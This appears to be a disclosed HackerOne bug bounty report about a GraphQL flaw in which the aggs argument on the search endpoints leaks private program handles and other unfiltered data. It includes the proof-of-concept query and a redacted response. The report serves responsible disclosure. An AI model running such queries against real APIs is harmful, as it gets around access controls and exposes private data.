ReigertjeH1:1838329HackerOne: Private information exposed through GraphQL search endpoints aggregates
Summary:
Private information can be exposed using aggs argument on the search and opportunities_search endpoints on the GraphQL root node.
Description:
When using the aggs argument and return field on the search and opportunities_search endpoints, the data returned in the aggs can potentially contain private information. It can for example be used to expose handles of private programs, and other data that can be aggregated by.
Steps To Reproduce
Specific example to expose private team handles, but other things can be exposed in the same way using this or other indexes on the search endpoint.
- Open and run any GraphQL client, or modify an existing GraphQL request
- Run a query with an aggregate for a field which could contain private information. The provided query can be tweaked to get more specific results.
# Write your query or mutation here
query {
me {
id
}
opportunities_search(query:{}, aggs:{results:{terms: {field:"handle"}}}) {
aggs
}
}
- The output will show aggregations by the
handlewhich are not filtered on whether they are private or not.
{
"data": {
"me": null,
"opportunities_search": {
"aggs": {
"results": {
"doc_count_error_upper_bound": 0,
"sum_other_doc_count": 37,
"buckets": [
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
}
]
}
}
}
}
}
Impact
Impact depends on what information is stored in which index, and which fields can be aggregated by. In the current situation at least allows to expose asset information, handles and other information of teams you donβt have access to.